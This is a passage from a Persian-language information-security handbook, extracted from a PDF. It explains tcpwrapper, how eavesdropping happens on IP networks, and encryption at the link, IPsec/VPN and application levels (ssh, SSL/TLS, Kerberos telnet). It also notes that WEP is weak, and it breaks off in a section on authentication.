‫ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ tcpwrapper‬ﻋﻼﻭﻩ ﺑﺮ ﻗﺒﻮﻝ ﻳﺎ ﺭﺩ ﺍﺗﺼﺎﻻﺕ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻋﻤﻠﻴﺎﺗﻲ ﭼﻮﻥ ﺟﺴﺘﺠﻮﻱ ﺑﺎﻟﻌﻜﺲ ﻧﺎﻡ‪ ،‬ﺛﺒﺖ ﺍﺿﺎﻓﻪ‪ ،‬ﺟﺴﺘﺠﻮﻱ‬
‫‪ ident‬ﺭﻭﻱ ﺍﺗﺼﺎﻻﺕ )ﺩﺭ ﺍﺩﺍﻣﻪ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩ(‪ ،‬ﺍﺭﺳﺎﻝ ﭘﻴﺎﻣﻬﺎﻱ ﺍﺗﺼﺎﻝ ﺑﻪ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻳﻲ ﻛﻪ ﻣﺘﺼﻞ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻭ ﺣﺘﻲ ﺍﺟﺮﺍﻱ‬
‫ﺩﺳﺘﻮﺭﺍﺕ ﻛﻤﻜﻲ ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﺭﻓﺘﺎﺭ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ﻣﺘﺼﻞﺷﻮﻧﺪﻩ ﺑﻪ ﺷﺒﻜﻪ ﺭﺍ ﻧﻴﺰ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ‪tcpwrapper‬ﻫﺎ‬
‫‪٢٩٦‬‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﻘﺎﻳﺺ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺳﺎﻳﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺷﺒﻜﻪ ﺭﺍ ﺟﺒﺮﺍﻥ ﻛﻨﻨﺪ‪.‬‬
‫ﻻ ﻫﺮ ﺑﺮﻧﺎﻣﻪ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺧﻮﺩ ﺭﺍ ﻧﮕﻬﺪﺍﺭﻱ ﻭ ﻣﺪﻳﺮﻳﺖ ﻣﻲﻛﻨﺪ )ﻭ ﻳﺎ ﺍﺯ ﺻﺎﻓﻴﻬﺎﻱ ﺑﺴﺘﻪ ﻣﺒﺘﻨﻲ‬
‫ﺩﺭ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﺩﻳﮕﺮ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺮ ﻣﻴﺰﺑﺎﻥ ﺳﻴﺴﺘﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﺪ(‪.‬‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺷﺒﻜﻪﻫﺎﻱ ‪ IP‬ﺍﺯ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ‬


‫ﭘﺮﻭﺗﻜﻞ ‪ IP‬ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﺑﺴﺘﻪﻫﺎ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﻭ ﻫﻴﭻ ﺗﻀﻤﻴﻨﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻨﻜﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺁﻥ ﺷﺒﻜﻪ‬
‫ﻗﺎﺩﺭ ﺑﻪ ﺩﺭﻳﺎﻓﺖ ﻭ ﺧﻮﺍﻧﺪﻥ ﺑﺴﺘﻪﻫﺎ ﺩﺭ ﻫﻤﺎﻥ ﻟﺤﻈﻪ ﻫﺴﺘﻨﺪ ﻳﺎ ﺧﻴﺮ ﺍﺭﺍﺋﻪ ﻧﻤﻲﻛﻨﺪ‪.‬‬
‫ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﺳﻴﻤﻲ ﺑﺪﻭﻥ ﺳﻮﺋﻴﭻ ﻭ ﺷﺒﻜﻪﻫﺎﻱ ‪ ،Ethernet‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻫﺮ ﻣﻴﺰﺑﺎﻥ ﺭﻭﻱ ﺷﺒﻜﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﺘﻪﻫﺎ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ‪،‬‬
‫ﺍﻣﻜﺎﻥ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﺑﺎﻻ ﺍﺳﺖ‪ .‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳﻮﺋﻴﭻ ‪ Ethernet‬ﻣﻲﺗﻮﺍﻧﺪ ﺍﻣﻜﺎﻥ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﺭﺍ ﺑﻄﻮﺭ ﻗﺎﺑﻞ ﻣﻼﺣﻈﻪﺍﻱ ﻛﺎﻫﺶ ﺩﻫﺪ‪.‬‬
‫ﺳﻮﺋﻴﭻ ﻳﻚ ﺍﺑﺰﺍﺭ ﻣﺨﺼﻮﺹ ﺷﺒﻜﻪ ﺍﺳﺖ ﻛﻪ ﺑﺴﺘﻪﻫﺎ ﺭﺍ ﺗﻨﻬﺎ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﻘﺼﺪ ﺁﻧﻬﺎ ﻣﻲﻓﺮﺳﺘﺪ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺑﺎ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺳﻮﺋﻴﭻ‬
‫ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻳﻚ ﭘﻮﺭﺕ ﺍﻧﻌﻜﺎﺳﻲ ﻳﺎ ﻳﻚ ﭘﻮﺭﺕ ﻧﻈﺎﺭﺕ‪ ،‬ﻭ ﻳﺎ ﺑﺎ ﺣﻤﻠﻪ ﺑﻪ ﺳﻮﺋﻴﭻ ﺑﺮﺍﻱ ﺑﻪ ﻫﻢ ﺭﻳﺨﺘﻦ ﺟﺪﺍﻭﻝ ﺩﺍﺧﻠﻲ ﺁﻥ ﻛﻪ ﻣﺮﺑﻮﻁ ﺑﻪ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺁﺩﺭﺳﻬﺎﻱ ﺷﺒﻜﻪﺍﻱ ﻣﻲﺷﻮﺩ‪ ،‬ﺍﻣﻜﺎﻥ ﻧﻈﺎﺭﺕ ﺑﺮ ﺗﺮﺍﻓﻴﻚ ﺷﺒﻜﻪﻫﺎﻱ ﺳﻮﺋﻴﭻ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻫﺮﭼﻨﺪ ﺷﺒﻜﻪﻫﺎﻱ ‪token ring‬‬
‫ﺫﺍﺗﹰﺎ ﺷﺒﻜﻪﻫﺎﻱ ﻋﺎﻡﮔﺴﺘﺮ ﻧﻴﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﺩﺭ ﻋﻤﻞ ﺗﻤﺎﻡ ﺑﺴﺘﻪﻫﺎﻱ ﺍﻧﺘﻘﺎﻟﻲ ﺩﺭ ﺁﻧﻬﺎ ﺑﻄﻮﺭ ﻣﺘﻮﺳﻂ ﺍﺯ ﻧﻴﻤﻲ ﺍﺯ ﻭﺍﺳﻄﻬﺎﻱ ﺭﻭﻱ ﺷﺒﻜﻪ ﻋﺒﻮﺭ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻣﻲﻛﻨﻨﺪ ﻭ ﻟﺬﺍ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﻣﺸﺎﺑﻬﻲ ﺩﺭ ﺁﻧﻬﺎ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﭘﻴﺸﺘﺮ ﺩﺭ ﻫﻤﻴﻦ ﻓﺼﻞ ﺑﺤﺚ ﺁﻥ ﺷﺪ‪ ،‬ﺧﻄﻮﻁ ﺗﻠﻔﻦ ﻭ ﺷﺒﻜﻪﻫﺎﻱ‬
‫ﺑﻲﺳﻴﻢ ﺭﺍ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻥ ﺷﻨﻮﺩ ﻛﺮﺩ؛ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺍﻧﺘﻘﺎﻻﺕ ‪ IP‬ﺭﻭﻱ ﺧﻄﻮﻁ ﺗﻠﻮﻳﺰﻳﻮﻥ ﻭ ﻳﺎ ﺧﻄﻮﻁ ﺑﺮﻕ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻮﺭﺩ‬
‫ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪.‬‬
‫ﺧﻼﺻﺔ ﻣﻄﻠﺐ ﺍﻳﻨﻜﻪ ﺩﺭ ﺑﻴﺸﺘﺮ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺷﺒﻜﻪ‪ ،‬ﺟﻠﻮﮔﻴﺮﻱ ﻭ ﻳﺎ ﺣﺘﻲ ﺷﻨﺎﺳﺎﻳﻲ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻣﻤﻜﻦ ﻧﻴﺴﺖ ﻭ ﺗﻨﻬﺎ ﺑﺎﻳﺪ ﻓﺮﺽ ﺭﺍ ﺑﺮ ﺁﻥ‬
‫ﮔﺬﺍﺷﺖ ﻛﻪ ﺗﺮﺍﻓﻴﻚ ﺷﺒﻜﻪ ﻣﻮﺭﺩ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻭ ﺳﻌﻲ ﻛﺮﺩ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ،‬ﺁﻧﺮﺍ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻢ ﻏﻴﺮﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ‪.‬‬
‫ﺍﻟﺒﺘﻪ ﺑﺎﻳﺪ ﺩﺭﻧﻈﺮ ﺩﺍﺷﺖ ﮐﻪ ﺣﺘﻲ ﺩﺭﺻﻮﺭﺕ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻴﺰ ﺁﺩﺭﺳﻬﺎ ﻭ ﭘﻮﺭﺗﻬﺎﻱ ﻣﺒﺪﺃ ﻭ ﻣﻘﺼﺪ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻢ ﻗﺎﺑﻞ ﻛﺸﻒ ﻭ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺑﺮﺍﻱ ﺗﺤﻠﻴﻞ ﺗﺮﺍﻓﻴﻚ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻪ ﻃﺮﻕ ﻣﺨﺘﻠﻔﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴﺖ ‪ IP‬ﻛﻤﻚ ﻛﻨﺪ‪:‬‬

‫‪295 Wietse Venemas’ Tcpwrapper System‬‬


‫‪ ۲۹۶‬ﺑﺮﺍﻱ ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭﻣﻮﺭﺩ ﭘﻴﻜﺮﺑﻨﺪﻱ ‪ tcpwrapper‬ﺑﻪ ﺻﻔﺤﺎﺕ ‪ ۳۱۵‬ﺗﺎ ‪ ۳۲۳‬ﻛﺘﺎﺏ ‪ PUIS‬ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٠٤‬‬

‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺭ ﺳﻄﺢ ﺍﺭﺗﺒﺎﻁ‬


‫ﺑﺎ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺭ ﺳﻄﺢ ﺍﺭﺗﺒﺎﻁ‪ ،‬ﺑﺴﺘﻪﻫﺎ ﺩﺭﺻﻮﺭﺕ ﺍﻧﺘﻘﺎﻝ ﺭﻭﻱ ﻳﻚ ﺍﺭﺗﺒﺎﻁ ﺩﺍﺩﻩﺍﻱ ﻧﺎﺍﻣﻦ ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﭘﺲ ﺩﺭﻳﺎﻓﺖ‬
‫ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﺷﻜﺴﺖ ﻣﻲﺧﻮﺭﺩ‪ ،‬ﭼﻮﻥ ﻣﻬﺎﺟﻢ ﻧﻤﻲﺩﺍﻧﺪ ﭼﮕﻮﻧﻪ ﺑﺎﻳﺪ ﺑﺴﺘﻪﻫﺎ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ‪ .‬ﺭﻣﺰﮔﺬﺍﺭﻱ‬
‫ﺩﺭ ﺳﻄﺢ ﺍﺭﺗﺒﺎﻁ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺤﺼﻮﻻﺕ ﺷﺒﻜﻪﻫﺎﻱ ﺭﺍﺩﻳﻮﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺳﺎﻳﺮ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﻋﺎﻡﮔﺴﺘﺮ ﺷﺒﻜﻪ ﻣﺜﻞ ‪ Ethernet‬ﻳﺎ‬
‫‪ FDDI‬ﻛﻤﺘﺮ ﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ‪ .‬ﺑﺮﺍﻱ ﻣﻮﺩﻣﻬﺎ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺧﻄﻮﻁ ﻣﺴﺘﻘﻴﻢ ﺍﺳﺘﻴﺠﺎﺭﻱ‪ ،‬ﺭﻣﺰﮔﺬﺍﺭﻫﺎﻱ ﺍﺧﺘﺼﺎﺻﻲ ﺍﺭﺗﺒﺎﻁ ﻧﻴﺰ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩﺍﻧﺪ‪.‬‬

‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺭ ﺩﻭ ﺍﻧﺘﻬﺎ‬
‫ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ ﻣﻴﺰﺑﺎﻥ ﻓﺮﺳﺘﻨﺪﻩ‪ ،‬ﻣﺤﺘﻮﺍﻱ ﺑﺴﺘﻪﻫﺎ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﺪ ﻭ ﻫﻨﮕﺎﻡ ﺩﺭﻳﺎﻓﺖ ﺑﺴﺘﻪﻫﺎ ﺩﺭ ﻃﺮﻑ ﺩﻳﮕﺮ‪ ،‬ﺍﻳﻦ ﻣﺤﺘﻮﻳﺎﺕ ﺑﻄﻮﺭ‬
‫ﺧﻮﺩﻛﺎﺭ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﻣﻮﻗﻌﻴﺖ ﻓﻴﺰﻳﻜﻲ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻣﺴﻴﺮﻳﺎﺑﻬﺎﻱ‬
‫ﺭﻣﺰﮔﺬﺍﺭ ﺑﻬﺮﻩ ﻣﻲﮔﻴﺮﻧﺪ‪ .‬ﺍﻳﻦ ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﺑﺴﺘﻪﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻳﻚ ﺍﺩﺍﺭﺓ ﺷﺮﻛﺖ ﺑﻪ ﺍﺩﺍﺭﺓ ﺩﻳﮕﺮﻱ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺭﺍ ﺑﻤﻨﻈﻮﺭ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻣﻬﺎﺟﻤﺎﻥ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻲﻛﻨﻨﺪ )ﺍﻳﻦ ﺭﻭﺵ ﺗﺤﺖ ﻋﻨﻮﺍﻥ ‪ VPN‬ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ(؛ ﺍﻣﺎ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺑﺴﺘﻪﻫﺎﻳﻲ‬
‫ﻛﻪ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﻳﮕﺮ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻤﻲﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺍﻣﺮﻭﺯﻩ ﺍﻳﻦ ﻧﻮﻉ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺭ ﺳﻄﺢ ﺑﺴﺘﻪ ﺑﻄﻮﺭ ﻋﺎﻡ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜﻞ ‪ IPsec‬ﺍﻧﺠﺎﻡ ﻣﻲﮔﻴﺮﺩ )ﻛﻪ ﺩﺭ ‪ RFC‬ﺷﻤﺎﺭﺓ ‪ ٢٤٠١‬ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ‬
‫ﺷﺪﻩ ﺍﺳﺖ(‪ IPsec .‬ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻏﻴﺮﻣﺤﺴﻮﺱ ﺗﻤﺎﻣﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻴﺎﻥ ﺩﻭ ﻣﻴﺰﺑﺎﻥ‪ ،‬ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻴﺎﻥ ﻳﻚ ﻣﻴﺰﺑﺎﻥ ﻭ ﻳﻚ‬
‫ﺷﺒﻜﻪ‪ ،‬ﻭ ﻳﺎ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻴﺎﻥ ﺩﻭ ﺷﺒﻜﻪ ﺑﻜﺎﺭ ﺑﺮﺩ‪ .‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ IPsec‬ﺭﻭﺵ ﻗﺪﺭﺗﻤﻨﺪﻱ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺧﻮﺩﻛﺎﺭ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ‬
‫ﻗﺎﺑﻠﻴﺖ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﺪﺍﺭﻧﺪ‪.‬‬

‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺭ ﺳﻄﺢ ﺑﺮﻧﺎﻣﻪ‬


‫ﺑﺠﺎﻱ ﺍﺗﻜﺎ ﺑﺮ ﺳﺨﺖﺍﻓﺰﺍﺭﻫﺎ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ،‬ﻣﻲﺗﻮﺍﻥ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺭﺍ ﺩﺭ ﺳﻄﺢ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﻧﺠﺎﻡ ﺩﺍﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻧﺴﺨﺔ ‪ Kerberos‬ﺍﺯ‬
‫ﺩﺳﺘﻮﺭ ‪ telnet‬ﻗﺎﺩﺭ ﺍﺳﺖ ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﻣﺤﺘﻮﻳﺎﺕ ﺟﺮﻳﺎﻧﻬﺎﻱ ﺩﺍﺩﺓ ‪ telnet‬ﺭﺍ ﺩﺭ ﻫﺮ ﺩﻭ ﺟﻬﺖ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻨﺪ‪ .‬ﭘﺮﻭﺗﻜﻞ ﭘﻮﺳﺘﺔ ﺍﻣﻦ‬
‫)‪ (ssh‬ﻧﻴﺰ ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺟﺮﻳﺎﻥ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺭ ﺳﻄﺢ ﺑﺮﻧﺎﻣﻪ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﺠﺎﺩ ﺗﻮﻧﻞ ﻳﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﭘﺮﻭﺗﻜﻞ ﺛﺎﻧﻮﻳﻪ ﺭﻭﻱ ﻳﻚ ﭘﺮﻭﺗﻜﻞ ﺳﻄﺢ ﺑﺮﻧﺎﻣﻪ‬
‫ﻛﻪ ﺩﺭﺣﺎﻝ ﻛﺎﺭ ﺍﺳﺖ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﭘﺮﻭﺗﻜﻞ ﭘﻮﺳﺘﺔ ﺍﻣﻦ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ ﻛﻪ ﭘﻮﺭﺗﻬﺎ ﻭ ﺍﺗﺼﺎﻻﺕ ‪ TCP/IP‬ﺑﺘﻮﺍﻧﻨﺪ‬
‫ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﺗﻮﻧﻞ ﺭﻣﺰﻧﮕﺎﺭ ﺍﺯ ﻳﻚ ﻣﻴﺰﺑﺎﻥ ﺑﻪ ﻣﻴﺰﺑﺎﻥ ﺩﻳﮕﺮ ﻣﻨﺘﻘﻞ ﺷﻮﻧﺪ‪ .‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ‪ SSL‬ﻭ ‪ TLS‬ﺭﻭﻱ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻭ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ﻣﻨﻔﺮﺩ ﺑﺮﻧﺎﻣﻪﺍﻱ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻫﻤﻴﻦ ﺻﻮﺭﺕ ﺍﻳﻤﻦ ﻧﻤﻮﺩ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﺓ ﺻﺮﻑ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﺎﻓﻲ ﻧﻴﺴﺖ‪ ،‬ﺑﻠﻜﻪ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺣﻔﺎﻇﺖ‪ ،‬ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﻮﺩ‪ .‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺩﺭ‬
‫ﺑﺎﻻ ﺑﺤﺚ ﺷﺪ‪ ،‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺍﺻﻠﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺮﺍﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ ﻣﺒﺘﻨﻲ ﺑﺮ ﭘﺮﻭﺗﻜﻞ ‪ (WEP) 802.11b‬ﺑﻬﻴﭽﻮﺟﻪ ﻣﺤﺮﻣﺎﻧﮕﻲ‬
‫ﻭﺍﻗﻌﻲ ﺭﺍ ﺍﻳﺠﺎﺩ ﻧﻤﻲﻛﻨﺪ؛ ﭼﺮﺍﻛﻪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻥ ﺩﭼﺎﺭ ﻧﻘﺺ ﺍﺳﺖ ﻭ ﻳﺎﻓﺘﻦ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ WEP‬ﻛﺎﺭ‬
‫ﭼﻨﺪﺍﻥ ﻣﺸﻜﻠﻲ ﻧﻴﺴﺖ‪.‬‬

‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﭘﻴﺸﺮﻓﺘﻪ‬


‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺧﺪﻣﺎﺕ ‪ ،IP‬ﺳﻴﺴﺘﻢ ﻗﺪﺭﺗﻤﻨﺪﻱ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﻳﺠﺎﺑﻲ ﺍﺭﺍﺋﻪ ﻧﻤﻲﺩﻫﻨﺪ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ‬
‫ﺑﻔﺮﺳﺘﺪ ﻭ ﺍﺩﻋﺎ ﻛﻨﺪ ﻛﻪ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﻣﺒﺪﺃ ﺩﻳﮕﺮﻱ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩﺍﻧﺪ‪ .‬ﻓﻘﺪﺍﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﻳﺠﺎﺑﻲ‪ ،‬ﻣﺸﻜﻼﺗﻲ ﺭﺍ ﺧﺼﻮﺻﹰﺎ ﺑﺮﺍﻱ‬
‫ﺧﺪﻣﺎﺗﻲ ﻧﻈﻴﺮ ‪ ،DNS‬ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻭ ﻧﻴﺰ ﺷﺒﻜﻪﻫﺎﻱ ﺧﺒﺮﻱ )‪Usenet‬ﻫﺎ( ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ‪ .‬ﺩﺭ ﺗﻤﺎﻡ ﺍﻳﻦ ﺧﺪﻣﺎﺕ‪ ،‬ﮔﻴﺮﻧﺪﺓ ﭘﻴﺎﻡ ‪ -‬ﭼﻪ‬
‫ﻻ ﺑﺮ ﺍﺳﺎﺱ ﻣﺤﺘﻮﺍﻱ ﭘﻴﺎﻡ ﻳﻚ ﻋﻤﻞ ﺍﺛﺒﺎﺗﻲ ﺍﻧﺠﺎﻡ ﺧﻮﺍﻫﺪ ﺩﺍﺩ‪ ،‬ﻣﺴﺘﻘﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﻓﺮﺳﺘﻨﺪﺓ ﭘﻴﺎﻡ‬‫ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻭ ﭼﻪ ﻳﻚ ﺍﻧﺴﺎﻥ ‪ -‬ﺍﺣﺘﻤﺎ ﹰ‬
